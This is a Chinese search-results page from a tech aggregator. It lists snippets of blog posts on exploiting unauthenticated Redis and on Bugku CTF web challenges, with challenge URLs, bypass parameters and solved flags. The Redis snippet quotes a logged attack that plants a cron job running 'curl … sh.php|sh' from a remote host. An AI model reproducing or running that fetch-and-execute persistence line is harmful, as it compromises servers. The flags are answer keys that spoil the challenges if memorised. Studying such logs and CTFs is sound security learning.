ICode9

精准搜索请尝试: 精确搜索
  • [日常] 研究redis未授权访问漏洞利用过程2021-06-17 19:53:03

    前提:redis允许远程连接,不需要密码 1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "\n\n*/2 *

  • CTF论剑厂Web(1)2020-09-20 20:00:37

    1.web26            这道题很简单,绕过第一个if,进入第二个if即可 第一个if是判断str是否是数字,让它不为数字即可 第二个if上面的语句,=的级别高于and,所以只要num为数字而str不为数字即可 http://123.206.31.85:10026/?num=4&str=abc 上面是一直简单的情况‘ 2.web1 打开之

  • BugkuCTF 部分WP(搬运了很多WP)2020-07-26 18:33:14

    WEB web2 http://123.206.87.240:8002/web2/ 右键或按F12查看源代码或者url前加view-source view-source:http://123.206.87.240:8002/web2/ 计算器 http://123.206.87.240:8002/yanzhengma/ F12 修改maxlength web基础$_GET http://123.206.87.240:8002/get/ GET传参 ?what=flag

  • Bugku的一道注入2020-02-06 11:56:24

    继续补sqli的题     这道题与之前的题的区别是在第二部分中加了一道waf,所以需要特殊的手段来进行注入。  题目来源:http://123.206.87.240:9004/1ndex.php?id=1    第一部分  通过改变id值我们可以看页面内容的变化。5时提醒可以注入,6以后开始报error:      构造

  • BugKuCTF 杂项 这是一张单纯的图片2019-09-02 19:37:10

    http://123.206.87.240:8002/misc/1.jpg 题解: 下载图片 记事本打开 HTML编码 解码 key{you are right}

  • CTF--web BugKu-ctf-web(1-10)2019-05-26 11:49:37

     1.web2 题目地址:http://123.206.87.240:8002/web2/ 查看网页源代码得到flag KEY{Web-2-bugKssNNikls9100} 2.计算器 题目地址:http://123.206.87.240:8002/yanzhengma/ 打开题目链接发现是简单的数学计算,但是只能输入一位数字 查看网页源码发现输入的maxlength=1 火狐浏览器f12,

  • Bugku-CTF之域名解析(听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag)2019-04-20 10:44:57

    Day 7 域名解析 50 听说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag       本题要点:  host配置文件       方法一: 修改hosts文件,路径为C:\Windows\System32\drivers\etc\hosts   在最底下添加: flag.bugku.com 120.24.86.145 保存 访问即可   方法二:   用

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有